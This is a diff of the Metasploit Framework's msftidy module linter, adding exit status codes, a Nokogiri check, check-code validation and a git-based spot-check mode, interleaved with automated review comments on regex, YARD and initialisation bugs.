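Review bot: `[*49152..65535].sample` inside the `while is_port_used?(lport)` loop materialises a ~16k-element array on every iteration; `lport = rand(49152..65535)` gives the same distribution without the allocation. `is_port_used?` only consults `@local_info` of existing sessions, so a port held by a running handler that has no session yet is not detected, and by Ruby convention the predicate should be named `port_used?`. The hunk also removes the "You must select a session" and shell-type guards without a visible replacement; if they were not moved elsewhere, the script will now fail later with a less specific error. The comment typo "alreayd" should be "already".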
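Review bot: `stdout.should =~ /#{Msf::Exploit::CheckCode::Unknown[1]}/` interpolates a human-readable message into a regex without escaping, so any `.`, `(` or `?` in that message changes the pattern's meaning or raises RegexpError. Use `stdout.should include(Msf::Exploit::CheckCode::Unknown[1])` or `/#{Regexp.escape(Msf::Exploit::CheckCode::Unknown[1])}/`. The enclosing example block starts outside the hunk.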
@@ -127,6 +127,7 @@ class String end def parse_gas_file(filename) + filename = File.expand_path(filename) unless ::File.exist?(filename) puts "File #(unknown) not found" return diff --git a/tools/msftidy.rb b/tools/msftidy.rb index 3437280c99..bc763fbaa9 100755 --- a/tools/msftidy.rb +++ b/tools/msftidy.rb @@ -8,8 +8,10 @@ # require 'fileutils' require 'find' +require 'time' CHECK_OLD_RUBIES = !!ENV['MSF_CHECK_OLD_RUBIES'] +SPOTCHECK_RECENT = !!ENV['MSF_SPOTCHECK_RECENT'] if CHECK_OLD_RUBIES require 'rvm' 
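Review bot: The not-found message below the new `File.expand_path` line reads `puts "File #(unknown) not found"` as shown here; if that is the real file content rather than a rendering artifact, the filename is never interpolated and it should be `puts "File #{filename} not found"`, which would now print the expanded path. The rest of parse_gas_file is outside the hunk.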
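Review bot: `SPOTCHECK_RECENT = !!ENV['MSF_SPOTCHECK_RECENT']` is true for any set value, including `0` or `false`, which is surprising for an env toggle wired from .travis.yml; if that is intended, a comment such as `# set to any value to enable` saves the next reader a check. `require 'time'` is added here, but the only new date use in the visible hunks is `DateTime.now.year`, which comes from `date`; `require 'date'` (or `Time.now.year`, which needs no require) states the dependency directly.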
@@ -38,36 +40,49 @@ class Msftidy LONG_LINE_LENGTH = 200 # From 100 to 200 which is stupidly long - attr_reader :full_filepath, :source, :stat, :name + # Status codes + OK = 0x00 + WARNINGS = 0x10 + ERRORS = 0x20 + + attr_reader :full_filepath, :source, :stat, :name, :status def initialize(source_file) @full_filepath = source_file @source = load_file(source_file) + @status = OK @name = File.basename(source_file) end public - ## # - # The following two functions only print what you throw at them, - # with the option of displying the line number. error() is meant - # for mistakes that might actually break something. + # Display a warning message, given some text and a number. Warnings + # are usually style issues that may be okay for people who aren't core + # Framework developers. # - ## - - def warn(txt, line=0) - line_msg = (line>0) ? ":#{line.to_s}" : '' + # @return status [Integer] Returns WARNINGS unless we already have an + # error. + def warn(txt, line=0) line_msg = (line>0) ? ":#{line}" : '' puts "#{@full_filepath}#{line_msg} - [#{'WARNING'.yellow}] #{txt}" + @status == ERRORS ? @status = ERRORS : @status = WARNINGS end + # + # Display an error message, given some text and a number. Errors + # can break things or are so egregiously bad, style-wise, that they + # really ought to be fixed. + # + # @return status [Integer] Returns ERRORS def error(txt, line=0) - line_msg = (line>0) ? ":#{line.to_s}" : '' + line_msg = (line>0) ? ":#{line}" : '' puts "#{@full_filepath}#{line_msg} - [#{'ERROR'.red}] #{txt}" + @status = ERRORS end + # Currently unused, but some day msftidy will fix errors for you. def fixed(txt, line=0) - line_msg = (line>0) ? ":#{line.to_s}" : '' + line_msg = (line>0) ? ":#{line}" : '' puts "#{@full_filepath}#{line_msg} - [#{'FIXED'.green}] #{txt}" end 
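Review bot: In `warn`, `@status == ERRORS ? @status = ERRORS : @status = WARNINGS` assigns on both branches and reads oddly; `@status = WARNINGS unless @status == ERRORS` expresses the "never downgrade" rule directly. The tags `@return status [Integer]` on warn and error are not valid YARD syntax (the name slot belongs to @param); write `@return [Integer] ...`. As rendered, the `def warn(txt, line=0)` signature and its first statement share a line; if that is the real source, split them.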
@@ -90,12 +105,24 @@ class Msftidy end end + def check_nokogiri + msg = "Requiring Nokogiri in modules can be risky, use REXML instead." + has_nokogiri = false + @source.each_line do |line| + if line =~ /^\s*(require|load)\s+['"]nokogiri['"]/ + has_nokogiri = true + break + end + end + error(msg) if has_nokogiri + end + def check_ref_identifiers in_super = false in_refs = false @source.each_line do |line| - if !in_super and line =~ /[\n\t]+super\(/ + if !in_super and line =~ /\s+super\(/ in_super = true elsif in_super and line =~ /[[:space:]]*def \w+[\(\w+\)]*/ in_super = false @@ -204,7 +231,7 @@ class Msftidy # # Mark our "super" code block # - if !in_super and line =~ /[\n\t]+super\(/ + if !in_super and line =~ /\s+super\(/ in_super = true elsif in_super and line =~ /[[:space:]]*def \w+[\(\w+\)]*/ in_super = false @@ -399,7 +426,7 @@ class Msftidy end if (ln.length > LONG_LINE_LENGTH) - warn("Line exceeding #{LONG_LINE_LENGTH.to_s} bytes", idx) + warn("Line exceeding #{LONG_LINE_LENGTH} bytes", idx) end if ln =~ /[ \t]$/ @@ -447,6 +474,13 @@ class Msftidy } end + def check_vuln_codes + checkcode = @source.scan(/(Exploit::)?CheckCode::(\w+)/).flatten[1] + if checkcode and checkcode !~ /^Unknown|Safe|Detected|Appears|Vulnerable|Unsupported$/ + error("Unrecognized checkcode: #{checkcode}") + end + end + private def load_file(file) @@ -458,10 +492,16 @@ class Msftidy end end +# +# Run all the msftidy checks. +# +# @param full_filepath [String] The full file path to check +# @return status [Integer] A status code suitable for use as an exit status def run_checks(full_filepath) tidy = Msftidy.new(full_filepath) tidy.check_mode tidy.check_shebang + tidy.check_nokogiri tidy.check_ref_identifiers tidy.check_old_keywords tidy.check_verbose_option @@ -476,6 +516,8 @@ def run_checks(full_filepath) tidy.check_lines tidy.check_snake_case_filename tidy.check_comment_splat + tidy.check_vuln_codes + return tidy end ## 
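Review bot: `check_nokogiri` hand-rolls a flag-and-break loop over `@source.each_line` where a single expression does the same work: `error(msg) if @source =~ /^\s*(require|load)\s+['"]nokogiri['"]/`, since `^` already matches at each line start. That also removes the mutable `has_nokogiri` flag and keeps the method in line with the other short check_* helpers.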
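Review bot: The guard in `check_vuln_codes` has an alternation-precedence bug: `/^Unknown|Safe|Detected|Appears|Vulnerable|Unsupported$/` anchors only the first and last alternatives, so a constructed `CheckCode::SafeAndSound` passes because the bare `Safe` branch matches, and only the first CheckCode occurrence in the file is examined because `.flatten[1]` picks a single capture. Group the alternatives and check every match: `@source.scan(/(?:Exploit::)?CheckCode::(\w+)/).flatten.each { |code| error("Unrecognized checkcode: #{code}") unless code =~ /\A(Unknown|Safe|Detected|Appears|Vulnerable|Unsupported)\z/ }`. Iterating with `@source.each_line.with_index` instead would additionally let the error carry the line number like the other checks.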
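Review bot: The new docblock on `run_checks` says `@return status [Integer] A status code suitable for use as an exit status`, but the `return tidy` added in the following hunk returns the Msftidy instance and the caller reads `.status` off it; correct the tag to `@return [Msftidy] the checker, whose #status holds the exit-style code`. The explicit `return tidy` at the end of the method can simply be `tidy`. This applies to both the @@ -458 and @@ -476 hunks of tools/msftidy.rb.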
@@ -486,9 +528,25 @@ end dirs = ARGV -if dirs.length < 1 - $stderr.puts "Usage: #{File.basename(__FILE__)} <directory or file>" - exit(1) +if SPOTCHECK_RECENT + msfbase = %x{\\git rev-parse --show-toplevel}.strip + if File.directory? msfbase + Dir.chdir(msfbase) + else + $stderr.puts "You need a git binary in your path to use this functionality." + exit(0x02) + end + last_release = %x{\\git tag -l #{DateTime.now.year}\\*}.split.last + new_modules = %x{\\git diff #{last_release}..HEAD --name-only --diff-filter A modules} + dirs = dirs | new_modules.split +end + +# Don't print an error if there's really nothing to check. +unless SPOTCHECK_RECENT + if dirs.length < 1 + $stderr.puts "Usage: #{File.basename(__FILE__)} <directory or file>" + exit(0x01) + end end dirs.each do |dir| @@ -497,9 +555,12 @@ dirs.each do |dir| next if full_filepath =~ /\.git[\x5c\x2f]/ next unless File.file? full_filepath next unless full_filepath =~ /\.rb$/ - run_checks(full_filepath) + msftidy = run_checks(full_filepath) + @exit_status = msftidy.status if (msftidy.status > @exit_status.to_i) end rescue Errno::ENOENT $stderr.puts "#{File.basename(__FILE__)}: #{dir}: No such file or directory" end end + +exit(@exit_status.to_i)
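Review bot: In the SPOTCHECK_RECENT branch, `last_release = %x{\\git tag -l #{DateTime.now.year}\\*}.split.last` is nil when no tag for the current year exists yet (early in a year, or on a clone without tags), and the following `git diff ..HEAD` then silently compares HEAD with itself, so no new modules are checked and the run exits 0. Guard it: `abort "No release tag found for #{Time.now.year}" unless last_release`. `Time.now.year` also avoids the legacy DateTime class and its `date` dependency. The space-separated `--diff-filter A` may not be accepted by older git versions; `--diff-filter=A` is the documented spelling.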
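Review bot: `@exit_status` is never initialised before the loop, so the comparison `msftidy.status > @exit_status.to_i` and the final `exit(@exit_status.to_i)` both lean on `nil.to_i`; set `@exit_status = Msftidy::OK` above the `dirs.each` loop and drop the `.to_i` calls. Since this is top-level script code, a plain local would serve as well as an instance variable on main. The `dirs.each` loop starts outside this hunk.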